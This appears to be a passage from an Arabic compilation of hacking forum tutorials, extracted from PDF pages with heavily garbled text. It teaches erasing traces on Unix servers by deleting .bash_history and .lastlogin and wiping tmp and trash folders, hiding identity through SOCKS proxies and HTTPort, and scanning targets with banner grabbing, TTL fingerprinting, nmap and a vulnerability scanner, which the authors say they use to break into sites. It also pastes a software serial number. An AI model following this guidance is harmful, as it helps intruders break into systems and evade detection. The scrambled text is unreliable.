..‬أوًل لبد أن تعلم أن من أهم‬ ‫خواص يونكس التي تمنحه القوة ‪ ..‬ملفاتك و جهاز كومبيوترك محمي‬ ‫بصورة جيدة للغاية لو ارتبط بانترنت بواسطة نظام التشغيل فقط و بدون استخدام برمجيات اضافية‪ ،‬ولكن‬ ‫حتى ولو حصل ذلك ففي غضون السابيع القليلة الولى سيفقد الجهاز الكثير من اجزاء حمايته نتيجة‬ ‫للستخدام الغير سليم لنترنت تتابع الشركات نظم التشغيل بشدة‪ ،‬الكل يتابع الثغرات في ‪Microsoft‬‬ ‫‪ Windows‬و ‪ Linux‬و ‪ Mac‬و غيرهما ‪ ،‬لذلك من الصعب الوصول الى تلك الجهزة بصورة فورية و‬ ‫بدون تدخل رسمي ‪.‫"بين حماية الخصوصية وإزالة الثارمن ملفات الـ ‪"Logs‬‬ ‫>منقول من منتديات الحزم السلمية<‬ ‫>الكاتب‪ :‬حزم الظامي<‬ ‫فيما يتعلق بموضوع التخفي ومنع تعقب الثر مع سيرفرات يونكس أو لينوكس ‪ .‬وهذا يقف عن قدرات كل شخص فينا ‪........‬‬ ‫في الواقع جميع الجهزة في انترنت تجمع المعلومات عنك ‪ ،‬ابسطها مثل عنوان ال ‪ IP‬و اكثرها حساسية‬ ‫مثل اسمك و رقم الهاتف الخاص بك ربما و عنوانك البريدي ‪ ..‬بل وال‬ ‫اتوقع ان عمر ابن ادم يفنى وهو يبحث عن المن على النترنت وكل ما تقدم مستواه كل ما اصبح يعي تمامًا‬ ‫كل ما حوله وما يجب ان يقوم به من اجل التخفي ومنع تعقب الثر ‪. Operation‬ثم ل بد أن تعلم أن ) ‪( Linux‬هو الصدار المجاني من نظام يونيكس ) ‪ .....‬تقوم على تعدد المستخدمين ‪Unix Multi-User Mode .‬‬ ‫القسم الثاني ‪ :‬يتعلق باتصالك وحماية خصوصياتك ‪ ..‬‬ ‫‪ .‬‬ ‫‪96‬‬ ... ( Unix‬يعني‬ ‫الفضل فهم يونيكس فحتمًا ستتعامل مع لينوكس بكل ارتياح كونك تتعامل مع ‪Unix‬‬ ‫أوًل أريد أقسم الموضوع لقسمين رئيسين ‪:‬‬ ‫ساتكلم عن كل واحد منهما بعجاله لن الموضوع ما تكفي ساعات معدودة لكتابة كل شيء عنه ‪ ...‬‬ ‫القسم الول ‪ :‬يخص ملفات النظام التي يسجل فيه اجراءاتك ‪( LOG File ) .

( LOG File‬مؤرخه بالوقت والجراء ‪.‬‬ ‫ملفات سجل الداء‬ ‫تبعًا لمزّود الويب الذي تستخدمه‪ ،‬تحتوي ملفات سجل الداء‪ ،‬على بعض‪-‬ومن المحتمل جميع‪-‬المعلومات‬ ‫التالية‪ ،‬لكل زيارة يقوم بها زائر إلى موقعك‪:‬‬ ‫وأريد أخبرك ان ثمة ملفات ل يمكنك الووصول لها وهي تراقب كل اجراءاتك ‪ ..‬لكن إذا زاد حجم‬ ‫ملف سجل الداء )‪ (log file‬عن بضعة كيلو بايتات‪ ،‬فإن التحليل اليدوي يصبح غير عملي‪ ،‬إن لم يكن‬ ‫ل كليًا‪ .‬‬ ‫ويمكن تحليل معلومات سجل الداء يدويًا‪ ،‬وهذا ما كان يفعله الناس‪ ،‬في بدايات شبكة ويب‪ ....‬وإذا أخذت بعين العتبار أن مزّودات اليوم توّلد ملفات لسجل الداء‪ ،‬يصل حجمها إلى‬ ‫مستحي ً‬ ‫ميجابايتات كثيرة‪ ،‬بل ويصل في كثير من الحيان إلى جيجابايت أو أكثر‪ ،‬لدركت ببساطة أن التحليل اليدوي‬ ‫غير وارد إطلقًا‪.‬‬ ‫وتسمى سجل الحداث كما تسمى ملفات سجل الداء‬ ‫جل جميع مزّودات الويب )‪ (Web servers‬معلومات واسعة عن حركة الوصول إلى موقعك‪ ،‬ضمن‬ ‫تس ّ‬ ‫ملفات سجل الداء )‪ ،(log files‬وهي عبارة عن ملفات نصوص بسيطة تلتقط نشاطات الكمبيوتر المزّود‪..‬‬ ‫‪97‬‬ .‬‬ ‫ما يتعلق بملفات التسجيل لجراءاتك تسمى ) ‪ .‬‬ ‫القسم الول ‪ :‬يخص ملفات النظام التي يسجل فيه اجراءاتك ‪.‬وتختلف الجراءات المنية‬ ‫من نظام لخر حسب قدرات مدير النظام الذي تعمل عليه ‪..‫والحقيقة انا لزلت في بداية طريقي لهذا المجال واسال ال ان يسهل ويفتح علينا من فضله ‪..

‬‬ ‫واذا مد ال في‬ ‫لحظ هذه الصورة ‪ :‬وهي من سي بانل مش فوتوشوب وبنفس الطريقة تتحكم في السيرفر بل اي معلومات‬ ‫عن المصدر الحقيقي للتصال ‪.‬‬ ‫‪bash_history.‬‬ ‫الطريقة تستخدم ‪ cpanel‬هو أفضل إجراء ‪ .‬‬ ‫بدايته بنقطه مما يعني انه ملف مخفي فاي ملف أو مجلد يبدا بنقطه اذا هو مخفي مباشرة في يوينيكس ‪.‫اقتباس‪:‬‬ ‫عموما أخوي هيكس تكلم عن هذه الملفات في نظام ‪.‬‬ ‫ليصبح محتواه ‪:‬‬ ‫‪rm ..‬هو اليبي الذي دخلت به اخر مره ‪. WIN NT‬‬ ‫وكيف يتم إزالة اللوق فايل ويمكن الرجوع لدرسه ‪.‬‬ ‫هنا راح تسجل جميع الوامر التي نفذتها‬ ‫‪contactemail.‬‬ ‫عموما أخواني للعلم حتى يمكنك اللعب بالنظام كامل باليبي المحلي ‪localhost :‬‬ ‫العمر تكلمنا عن هذا الموضوع باذن ال ‪.‬‬ ‫اذا ما كنت تستخدم الشل النصي للتعامل مع البريد‬ ‫أيضًا أريد منك حذف هذين المجلدين‬ ‫‪ Tmp‬والخر ‪ trash. etc‬‬ ‫هنا مشكلة ربما يعرفها البعض ‪.bash_history..‬‬ ‫عموما أهم الملفات حاليًا أريدك تحذفها كل ما تستخدم الشل النصي ‪ .‬يكفي ان الدوس صاحب المكانيات والسهولة ‪ .‬‬ ‫هو كوني حذفت ملفي ‪lastlogin & .‬هي كالتالي ‪:‬‬ ‫‪lastlogin.‬وسرعة التنفيذ‬ ‫والستجابه هو في الصل جزء أو أداة من أدوات يونيكس وعملت مايكروسوفت على تطويرها وال فالصل‬ ‫هو يونكس بل ادني شك ‪....‬وللعلم يا أخون هناك اعدادت جباره في اليونكس تمكنك من‬ ‫البداع ومن التجديد والبتكار ‪....‬ويا حبذا تنسف معهم مجلد ‪.‬‬ ‫طيب وش الحل ننسفها نهائيًا وما نريد أوامر الحذف تظهر ‪...bash_history‬‬ ‫وراح يكون ناتج ملف ‪ lastlogin......‬‬ ‫باستخدام المر ‪ rm‬تلقائيًا راح يكون ناتج هذا الجراء تجدد ملف الباش ‪bash_history..‬‬ ‫‪98‬‬ ..bash_history‬‬ ‫‪rm ..‬‬ ‫وهذا الملف يسجل به اخر ايبي سجل الدخول ‪.‬‬ ‫وانا الن راح اخبرك عن اهمها ول يشترط ان تزيل كل شي ‪:‬‬ ‫) فما ل يدرك كله ل يترك جله ( ودائمًا حتى ل تحبط ) إذا لم تستطع شيئًا فدعه وجاوزه إلى ما تستطيع (‬ ‫عموما الطريقه المثلى للتعامل مع انظمة يونكس ‪ .‬هي استخدام الشل النصي وهذا رأيي فأنا إلى الن اعيش‬ ‫في ذهول من قدرات هذا النظام العجوز ‪ .

..‬اشتغل ببروكسي يعمل مع بروتوكولت التصفح )‪ ( HTTP Protocol‬ويجب أن ندرك أنك‬ ‫حين تتعامل مع نظام يونيكس أو النظمة الخرى الشبيهه‬ ‫والحقيقة ان كونك تستخدم البروكسيات المعتاده للتصفح فهذا ل يخفي هويتك اذا استخدمت بروتوكولت‬ ‫‪ HTTP‬ولكن الحل المثل ‪ .... Whois.‬‬ ‫ويتميز هذا النوع بالمان ‪.. Protocol‬‬ ‫‪ . ( Router‬الول ‪ :‬إستاتيكي يتطلب من مدير الشبكة ضبط يدوي ‪. SOCKS Protocol‬فيجب عليك‬ ‫إيجاد ارقام سوكس لستخدامها حماية لخصوصيتك أو عند الحاجة للتخفي اناء عملك على النظام ‪...‬أنك تستخدم بروكسيات السوكس ‪ ...‬وتكمن وظيفته في تغيير معلومات موارد خدمة النترنت‬ ‫التي تتصل بها ‪ .‬فوال تستطيع‬ ‫الحذف ‪. Finger...‬‬ ‫عموما البروكسيات في مجملها ثلثة أنواع ‪..... Socks Proxy Service (3‬وهذا القوى ويستفاد منه في )‪SSL) Secure Sockets‬‬ ‫‪ Layers‬بالضافة إلى )‪ IIS) Internet Information Server‬ويخدم مع ‪Windows NT‬‬ ‫وكذلك ‪ FTP ، Telnet، Gopher،IRC ، RealAudio ، POP3‬وهذا النوع يجمع بين كونه‬ ‫‪ firewall‬إضافة إلى خدمة أمنية ‪ .‬وضعتها وزارة الدفاع المريكية ‪ransmission Control . HTTP Protocol .‬وعادة ما يستخدم فيها بروتوكول ‪ TCP/IP‬ويستخدم هذا البروتوكول وسيلتين للتصال‬ ‫‪:‬‬ ‫* طريقة المنظمة العالمية )‪(Internationa Organization for Standardization‬‬ ‫** مجموعة بروتوكولت للتصالت ‪ .‫عموما سأعود لهذا الموضوع اذا مد ال بالعمر وال اني اعمل من اشهر على كتابة دروس نظرية وتطبيق‬ ‫عملي لحتراف يونيكس ‪..‬ومواصفاتها وعناوينها الخاصة ‪. securiy . DNS lookup... Protocol TC‬‬ ‫الحقيقة أخواني هناك أمر هام جدًا وهو أن ثمة برامج تساعدك كثيرًا بتقنياتها المحترفة تساعدك في التخفي‬ ‫من تقنيات الرقابة التي ل يخلوا منها نظام ‪ .. SNMP‬وهذا يكون باعتبار‬ ‫النظام واعتبار بروتوكول التصال الذي يستخدمه نظام ‪ .‬‬ ‫وهنا نوعين للموجهات أو الموزعات )‪ ..‬وهي كثر جدًا ‪:‬‬ ‫‪ Ping، Traceroute..‬‬ ‫ننتقل للجزء الخر ‪.....‬‬ ‫القسم الثاني ‪ :‬يتعلق باتصالك وحماية خصوصياتك ‪ .‬‬ ‫أخوي الحقيقة المشكلة أن الغلب منا يستخدم إما نفس البروكسي لمستضيف الخدمه اللي يستخدمه ‪ . WIN NT :‬ويستفيد من وتوكول ‪TCP/IP‬‬ ‫لمراقبة النظام ‪...‬‬ ‫وبالمقابل يتم مراقبة نظام ‪ UNIX‬عن طريق الرواتر ‪ Router ....‬وهو أداة فعاله لتشخيص النظام ونعني‬ ‫بهذا المصطلح أي الموجه أو الموزع ويتميز الراوتر بقدرته على التعرف على كل جزء من أجزاء الشبكة‬ ‫ويعمل عى مراقبة الداء وموازنة سير البيانات ويسمح للشبكات المتصلة بالحفاظ على استقلليتها‬ ‫‪..‬‬ ‫‪ WinSock Proxy Service (2‬وهذا مفيد مع سيرفرات ‪ windows NT‬ويفيد في عملها على‬ ‫اخفاء هويتك عند العمل على بروتوكولت ‪ telnet‬أو ‪ FTP‬وهذا هو البروتوكول ‪WinSock‬‬ ‫‪.‬‬ ‫‪99‬‬ .‬وان‬ ‫سهل ال ‪ ....‬وهذا يقف عن قدرات كل شخص فينا ‪..‬‬ ‫‪ Web Proxy Service (1‬وهذا للتصفح ‪...‬‬ ‫وراح نكمل الحديث عن ملفات اللوق وحذفها حتى وإن لم يكن مسموح لك بملكيات ‪ . LDAP..‬‬ ‫‪.

.‬ببرامج أو بدون ‪ ....‬يقوم بأعماله اتوماتيكيًا ‪.‫والثاني ديناميكي ‪ .‬‬ ‫عموما انا اسف ربما تفرعت في هذا الموضوع ‪ ...‬‬ ‫تقنية حديثة مرتبطة ببروتوكول التصال ‪ TCP/IP‬الخاص بشبكة النترنت‪ ،‬فقد صمم برنامج ‪HTTPort‬‬ ‫من أجل إخفاء الهوية الحقيقية عن الخرين وأيضا يتخطى المرشح(البروكسي ‪) Proxy Server‬التابع‬ ‫لمزود الخدمة ‪ ISP‬وأشبه ما يوصف بأنه برنامج يشغل برامج النترنت من تحت نفق وهمي يتجاوز‬ ‫الحواجز المنية )المرشح ) ‪ Proxy‬وليرتبط مع بروكسي آخر‪...‬‬ ‫صورة للبرنامج اناء عمله ‪.‬‬ ‫وهنا ايضاحات لبعض الخدمات التي يؤديها البرنامج ؟‬ ‫‪100‬‬ ..‬أنا أقول لكم عليكم‬ ‫بتشفير أو إخفاء أو تزوير بياناتكم باي طريقة ‪ .‬‬ ‫وكما ذكرنا فان برنامج ‪ HTTPort‬بطريقة عمله يحقق حرية التصفح في شبكة النترنت وإخفاء هوية‬ ‫المستخدم ‪.‬‬ ‫بل وستخدم ايضًا بروتوكول ‪ SOCKS‬ويقوم بدوره خير قيام فهو يخفي هويتك ول يمكن حتى لمسؤول‬ ‫الشبكة المحلية معرفة نشاطك ناهيك عن هويتك ‪...‬عموما إخواني بالنسبة للتصال ‪ .‬ويحتاج الى ضبط بسيط وهو أقل أمانًا من الول ‪.‬‬ ‫وهناك برامج جيدة كالتالي ‪ :‬أفضلها في نظري أداءًا وسهولة ‪ ...‬وعليكم بمراقبة هذه البورتات ‪:‬‬ ‫‪Port 21 = FTP‬‬ ‫‪Port 23 = Telnet‬‬ ‫‪Port 25 = SMTP‬‬ ‫‪Port 53 = DNS‬‬ ‫‪Port 79 = Finger‬‬ ‫‪Port 80 = HTTP‬‬ ‫‪Port 110 = POP3‬‬ ‫‪Port 111 = SunRPC‬‬ ‫‪Port 139 = NetBIOS‬‬ ‫‪Port 443 = SSL‬‬ ‫‪Port 1080 = SOCKS‬‬ ‫‪Port 8181 = IMail‬‬ ‫والحقيقة الفضل من هذا كله أن تسجل دخولك باليبي المحلي أو لبد أن تستخدم بروكسيات من نوع سوكس‬ ‫‪.‬برنامج ‪ HTTPort‬ومعروف لديكم أكيد ‪.

101 .

102 .

103 .

104 .

analogx. FTP (file transfer). ‫هذا بالضافة إلى أن المتصفح اكسبلورر يسمح لك باضافة بيانات مزود الخدمة‬ ( Anonymous) ‫وهمي للتخفي‬ : ‫ واسمه‬. If you are running a special server of some sort. HTTPS (secure web).com/files/proxyi. AOL. AOL Instant Messenger.exe PortBlocker : ‫ويدعمه برنامج آخر اسمه‬ ‫يساهم في حماية البورتات التي تستخدمه في تصفحك أو نقلك للملفات أو غيرهما من ان تستخدم في مراقبة‬ : ‫تحركاتك وتسجيل معلوماتك‬ PortBlocker is configured to block the most common types of servers that might be on a system (FTP. POP3 (recieve mail). so will not require any modification for most users.. and many more http://www. . etc).. Netscape.‫ سواءًا كان الفعلي أو‬.. and Socks4/4a and partial Socks5 (no UDP) protocols! It works great with Internet Explorer.. then you can easily add it's ports (either TCP or UDP) to it's list.and have them blocked and/or logged Log unauthorized port access attempts and secure internal servers from . : ‫فهو يدعم كل هذا‬ SMTP (send mail). NNTP (newsgroups). Microsoft !Messenger.internet access easily 105 . ‫ كيلو بايت إل أنه يخدم أكبر من حجمه بكثير جدًا‬18 ‫وهناك برنامج صغير ل يتعدى حجمه‬ AnalogX Proxy HTTP (web). HTTP...

com/software/pla/setup.analogx.zip‬‬ ‫ناهيك عن أن المتصفح يسمح لك بتعبئة البيانات كما تحب ‪.‬لني متأكد ان الكم الهائل‬ ‫من المعلومات المرسلة والتقارير عنك وعن غيرك منتظمة وخفية ولكن آن لها أن تفضح ‪.mechanicalminds.‬‬ ‫فأقدم لكم هذا البرنامج لكي تعرفوا كل ما تم تسجيله عنكم ول تنسوني من دعوة ‪ .‫حمل من هنا برنامج ‪PortBlocker‬‬ ‫‪http://www.07 :‬بدون ضغط‬ ‫‪http://www...‬‬ ‫‪..‬‬ ‫بالطبع كلكم تعلمون أن مايكروسوفت معروفة بطبعها التجسسي ‪. Gopher.‬‬ ‫‪Provides a space for you to type the address and port number of the‬‬ ‫‪proxy server you want to use to gain access to the Internet over HTTP..‬‬ ‫اسم البرنامج ‪Proxy Log Analyzer :‬‬ ‫صورة ‪:‬‬ ‫للتحميل ‪ MB 1.com/software/pla/pla.exe‬‬ ‫والحقيقة أحمد ال الذي ذكرني بهذا البرنامج المميز وهو الذي يوضح لك كل المعلومات التي سجلت‬ ‫لمراقبتك أناء عملك على نظامك ‪.. and Socks protocols‬‬ ‫‪106‬‬ .com/files/pblocki.exe‬‬ ‫‪ZIP archive instructions 818 kb‬‬ ‫‪http://www.Secure.mechanicalminds.. FTP.

‬‬ ‫‪107‬‬ ...‬‬ ‫والطريقة سهله ‪ .‬اذهب افتح الماسنجر من قائمة ادوات خذ خيارات ‪.‫فقط استخدام العدادت المتقدمة للتصال ‪:‬‬ ‫حتى اليبي بالماسنجر بامكانك ترسل كل ملفاتك بل حصول أي انسان على اليبي الحقيقي لك ‪.

zip‬‬ ‫‪-----------------------‬‬‫الشرح‪:‬‬ ‫‪------------------------‬‬‫الشرح قام بشرحه أخي العزيز‬ ‫‪FAHAD‬‬ ‫ال يخليه ماخلى شي من خبراته إل وطرحه‬ ‫نــقـــــول بســــم ال‬ ‫الشكل الول‬ ‫‪108‬‬ .angelfire.‫انتهى‪،،،‬‬ ‫"برنامج ‪ HTTP Port‬الذي يجعلك تتصفح النت متخفيا!!"‬ ‫>ةةةةة ةة ةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪:‬ةةةةةة<‬ ‫اسم البرنامج‪:‬‬ ‫‪-----------------------‬‬‫‪HTTPort 3snf‬‬ ‫‪-----------------------‬‬‫الوظيفة‪:‬‬ ‫‪-----------------------‬‬‫برنامج لتصفح بسرية وأمان‬ ‫في النترنت‬ ‫ويريحك من البروكسيات الرقمية‬ ‫ومن البحث عنها‬ ‫‪.com/tv2/ssdd63/httport3snf..‬‬ ‫‪-----------------------‬‬‫وصلة التحميل‬ ‫‪-----------------------‬‬‫‪http://www...........

‫واجهة البرنامج الرئيسية أضغط على الختيار الثالث فوق‬ ‫‪Port mapping‬‬ ‫الشكل الثاني‬ ‫أضغط على الختيار ‪Add‬‬ ‫سوف تضاف قائمة مثل التي في الشكل أسمها‬ ‫‪New mapping‬‬ ‫لين الحين كل شي تمام‬ ‫الشكل الثالث‬ ‫‪109‬‬ .

net‬‬ ‫‪Remote port : 3128‬‬ ‫‪OKY MAN‬‬ ‫الشكل الرابع‬ ‫الن عد للختيار الثاني فوق ‪Proxy‬‬ ‫واكتب مكان الرقم واحد البروكسي الصلي لشتراكك‬ ‫سمعت ‪ .‫هنا ياطويل العمر تكتب نفس الكلم والرقام المكتوبة زي كذا‬ ‫‪Local port : 80‬‬ ‫‪Remote host : webcache.‬الصلي‬ ‫‪110‬‬ .bt...

‬‬ ‫انتهى‪،،،‬‬ ‫‪111‬‬ .0..‫ومكان الرقم أثنين المنفذ‬ ‫وفي الخير ضغطه قوية على الزر‬ ‫‪Start‬‬ ‫ماخلصنا بقى الخطوة الخيرة‬ ‫الشكل الخامس‬ ‫من خيارات النترنت‬ ‫ضع البروكسي ‪127.0.1‬‬ ‫والمنفذ ‪80‬‬ ‫والحين روح للمتصفح وأدهر بكيفك‬ ‫وكيف نفسك بنفسك وما عليك رقيب إل ال عزوجل‪.

.neoworx.‬‬ ‫اسم البرنامج ‪.‬‬ ‫‪http://www.‬‬ ‫هاذا برنامج ممتاز للكشف عن معلومات الشخص و بلده و كل شيء بس بمجرد معرفة اليبي ماله ‪ .‬‬ ‫‪Neo Trace Express‬‬ ‫اتفضلوا الوصلة ‪...exe‬‬ ‫‪112‬‬ .com/download/NTX325.‬او تريد‬ ‫تعرف معلومات عن موقع معين ‪..‫" شرح برنامج ‪" NeoTrace‬‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪< DarK_HaCKeR :‬‬ ‫برنامج يكشف كل شي عن صاحب اليبي‬ ‫مرحبا شباب ‪..

113 .

‫اتمنى ان الشرح وافي وهذا هو السيريل نمبر ‪:‬‬ ‫‪XDQG-2ZKN-X2PA-KTRQ‬‬ ‫انتهى‪،،،‬‬ ‫‪114‬‬ .

0.1 HTTP/1.‬‬ ‫وكيف راح نستغلها في كشف معلومات الموقع؟‬ ‫عن طريقة أداة ‪ Telnet Client‬عميل التلنت والطريقة هي أن تقوم بالتصال بأحد المنافذ سواء كان‬ ‫‪FTP 21‬‬ ‫أو‬ ‫‪TELNET 23‬‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫=)الطريقة الرابعة(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫وهي ‪HTTP‬‬ ‫‪Hyper Text Transfer Protocol‬‬ ‫ويعمل على المنفذ ‪8080 .com‬‬ ‫نقوم بإرسال رسالة ليميل وهمي وغير موجود مثل‬ ‫‪dfl.netcraft.1‬‬ ‫تقوم بتنفيذه ‪.com‬‬ ‫وبعد ارسال رسالة ليميل وهمي راح تستقبل رد ولما تعرض الـ ‪ Headers‬الخاص بالرسالة راح تلقي‬ ‫معلومات عن الموقع‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫=)الطريقة الثالثة(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫الـ ‪Banners‬‬ ‫ماهو البانر؟‬ ‫البانر وباختصار شديد هي الرسائل التي تأتيك عندما تنفذ أمر ما يعني الرد‪...1‬‬ ‫بعد كذا راح يخبرنا البانر بوجود صفحات الخطأ ‪400‬‬ ‫وراح تجيك معلومات هائلة عن الهدف‬ ‫وفيه عندك امر ثاني وهو‪:‬‬ ‫‪HEAD 127.0.80‬‬ ‫ألحين نتصل على المنفذ ‪ 80‬عن طريق ‪ Telnet‬وبعدين نكتب المر التالي‬ ‫‪GET /qwe HTTP/1.‬‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫‪115‬‬ .com‬‬ ‫وتكتب الموقع هناك وراح يعرض لك معلومات تفيدك كثير‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫=)الطريقة الثانية(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫وهي قديمة تستخدم حديثا لكني لادري مدى عملها ولنفرض الموقع الي نبي نجيب معلومات عنه هو‬ ‫‪/http://www.kjgk'dgjbumpipt@almodammer..‫" كيفية القيام بجمع المعلومات عن موقع أو شبكة "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫طرق جمع المعلومات لي موقع أو سيرفر أو شبكة أيا كانت ‪:‬‬ ‫=)الطريقة الولى(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫وهي من خلل زيارة موقع‬ ‫‪/http://www.almodammer.

x Intel 64‬‬ ‫‪Solaris 8 Intel/Spar 64‬‬ ‫‪Solaris 2..x Intel 64‬‬ ‫‪OpenBSD 2.x IBM/RS6000 60‬‬ ‫‪AIX 4.2.x IBM/RS6000 60‬‬ ‫‪Cisco 11..‫=)الطريقة الخامسة(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫وهي من أمر ‪ ping‬الذي يقوم بإرسال عدة طلبات للـ ‪ ip‬أو للموقع ويقوم باستقبال الردود وبسرعة هائلة‬ ‫الحين كيف نستفيد منها في تحديد معلومات للموقع !‬ ‫حيث تقوم بوضع التالي‬ ‫‪ping ipsite‬‬ ‫‪ =ipsite‬الي بي الخاص بالموقع‬ ‫وراح يطلعلك عدة اسطر حنا مايهمنا ال كلمة‬ ‫‪TTL=XXX‬‬ ‫‪=XXX‬القيمة والعدد الي طلعلك‬ ‫بتقولي وش فايدته أقولك من خلله يمكن تحديد نظام التشغيل وهذي امثلة‪:‬‬ ‫‪Windows 9x/NT Intel 32‬‬ ‫‪Windows 9x/NT Intel 128‬‬ ‫‪Windows 2000 Intel 128‬‬ ‫‪DigitalUnix 4.11 Intel 128‬‬ ‫‪AIX 4.x SGI 60‬‬ ‫‪FreeBSD 3.3 STRATUS 64‬‬ ‫‪SCO R5 Compaq 64‬‬ ‫‪Netware 4.‬الخ(‬ ‫=============‬ ‫‪( Shadow Sceurity Scanner‬من أفضل برامج البحث عن المنافذ والتطبيقات والعمليات ومعظم‬ ‫‪116‬‬ .x Intel 64‬‬ ‫‪FTX(UNIX) 3.0 Alpha 60‬‬ ‫‪Unisys x Mainframe 64‬‬ ‫‪Linux 2.3.2.0 2514 255‬‬ ‫‪IRIX 6.x Intel/Sparc 255‬‬ ‫وقد يحدث اختلف في القيم حيث يكون الفرق يساوي واحد‬ ‫أي‪ :‬عند مرور ‪) data list or packet‬حزم او قائمة بيانات( بـ ‪ Nodes‬حيث أن ‪ TTL‬تنقص بـ ‪1‬‬ ‫لذلك عليك ان تستعمل أمر ‪ tracert‬في الويندوز أما ‪ traceroute‬فهو خاص باليونكس‬ ‫وهو امر خاص بعرض معلومات عن الشخص أو الموقع‬ ‫ويمكننا استخدامه بهذه الطريقة‬ ‫‪tracert ip‬‬ ‫‪ =ip‬عنوان الموقع أو السخص‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫=)الطريقة السادسة(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫عن طريقة الدوات والبرامج‬ ‫أول ‪ Windows‬لنه السهل‬ ‫يمكنك تحديد معلومات عن الموقع والسيرفر او المنافذ المفتوحة من قبل تطبيق اي برنامج ويمكنك استغلل‬ ‫المنافذ بكثير من عمليات الختراق وسوف نطرق لها في الدرس الثاني‬ ‫تعرفون ان الويندوز مليان برامج لكن تعرفون ان مو كل برنامج مثل أي برنامج عشان كذا راح اذكر الفضل‬ ‫‪:‬‬ ‫‪) N-Stealth‬لتحديد معلومات عن الشبكة منها المنفذ ثغرات ‪.2 7507 60‬‬ ‫‪Cisco 12.

Use twice for greater effectP0 Don't ping hosts (needed to scan http://www.* (interactive Go into interactive mode (then press h for help-Example: nmap -v -sS -O http://www.90 SEE THE MAN PAGE FOR MANY MORE OPTIONS..decoy2[.*.. 3.6666.88'*.31337F Only scans ports listed in nmap-services. ‫منها المنافذ والصدار والملقم والسيرفر‬ ^^^^^^^^^^^^^^^^^^^ =(‫=(الطريقة السابعة‬ 117 . Xmas. most can be combined O Use TCP/IP fingerprinting to guess remote operating system..com ‫=الموقع المراد فحصه‬almodammer. Use '-' for stdinS /-e Specify source address or network interface.‫ الخاص بالبرنامج‬man page ‫ولخلفية ومعلومات اكثر قم بالذهاب إلى‬ ‫لنشرح أهم أمر وهو‬ nmap -sS -O -vv almodammer.-sX.* T General timing policyn/-R Never do DNS resolution/Always resolve [default: sometimes[resolve oN/-oX/-oG Output normal/XML/grepable scan logs toiL Get targets from file.com/ 192.* (sT TCP connect() port scan (default for unprivileged userssU UDP port scan.microsoft..0.. Its use is recommended.. or Null scan (experts only..v Verbose.com/ and(others Ddecoy_host1.my.com ‫وراح يعرض لك معلومات هائلة تفوق معلومات برامج وأدوات ويندوز‬ .* (sP ping scan (Find any reachable machines(sF.00 Usage: nmap [Scan Type(s)] [Options] (Some Common Scan Types ('*' options require root privileges ((sS TCP SYN stealth port scan (default if privileged (root. DESCRIPTIONS..1080.0/16 '192..* 'p ports to scan.-sN Stealth FIN.(‫الثغرات مع وجود شرح لكيفية علجها‬ ============= ‫ (برنامجي المفضل فأنا استخدمه لختراق المواقع والجهزة حيث يساعدني كثيرا في معرفة‬SuperScan (‫ كبيرة يمنك الضافة عليها كيفما شئت‬List ‫المنافذ المفتوح بالموقع والجهزة ويحتوي على‬ ------------------------------------------------------------------------Linux ‫الحين نجي على‬ ‫هو برنامج واحد مفضل وأكثر مستخدمين ليونكس يشهدون بجدارته والذي يحمل اسم‬ Nmap (‫ )مستكشف الشبكات‬Network Maper ‫اختصار لـ‬ ‫ وهو خاص للمتهمين‬Linux ‫وطبعا يفوق كل ادوات ويندوز وطرق ويندوز علشان كذا دائما ينصح بـ‬ ‫السيرفرات‬/‫المواقع‬/‫باختراق الشبكات‬ : ‫كيفية استمعاله‬ /‫ وراح تجد الكثير من الوامر الذي ظهرت مثل‬nmap ‫شغل‬ [l] Nmap V..* (sR/-I RPC/Identd scan (use with other scan types:(Some Common Options (none are required. Example range: '1-1024. AND EXAMPLES !!!!!!!!! ‫وأيضا يحتوي العديد من الوامر المجهولة‬ .168.] Hide scan using many decoys.

..‫^^^^^^^^^^^^^^^^^^^‬ ‫تعتمد على وجود جهازك ‪ Linux‬أو ‪ Shell Account‬حتى تقدر تطبق اوامر اليونكس في الويندوز لكن‬ ‫لو تركب ‪ Linux‬أفضل لن ‪ Shell‬لزم يكون ممتاز وسعره مناسب علشان كذا لتتعب نفسك وركب‬ ‫‪ Linux‬وارتاح‬ ‫المهم هذا أمر ‪whois‬‬ ‫والي يوفره لنا ‪ Linux‬والويندوز كبرامج كبيرة وثقيلة وغير دقيقة‬ ‫ولمعلومات أكثر اضف المر‬ ‫‪man whois‬‬ ‫‪------------------------------------------------------------------‬‬‫أما عن طريق الويندوز فيمكنك البحث في ‪google‬‬ ‫‪http://www........google..com/search?q=whois&btnG=Google+Search‬‬ ‫والكثير من المواقع تقدم هذي الخدمة وهي سكربتات و ‪ cgi‬تقوم بالبحث عن الموقع بإحدى الطرق التي‬ ‫ذكرتها مع اختلف بسيط وهي شبيهة بموقع ‪ netcraft‬الطريقة الولى‪....‬‬ ‫انتهى‪،،،‬‬ ‫‪118‬‬ .

‫" برنامج عمران سكان للبحث عن الثغرات "‬ ‫>ةةةةة ةة ةةةة ةةةةةةةةةة<‬ ‫>ةةةةةة‪>P @ LH@CKERZ :‬‬ ‫برنامج عمران سكان يعتبر من أفضل برامج كشف الثغرات و ذلك لما يتميز به من سرعه سهولة في تغيير‬ ‫‪.XXX.‬ملف الثغرات‬ ‫‪ 1‬اسم الموقع المراد البحث عن ثغرات فيه‬ ‫و ل تنسى ‪//:http‬‬ ‫ملحظه ‪:‬‬ ‫ل تضع \ في نهايه الموقع مثل‬ ‫‪/http://www.com‬‬ ‫لنه سيضع من عنده ‪ /‬عند تطبيق الثغره‬ ‫‪ 2‬اسم ملف الثغرات‬ ‫‪ 3‬لتغيير ملف الثغرات إلى ملف آخر‬ ‫‪ 4‬الثغرات الموجوده في الملف‬ ‫‪119‬‬ .

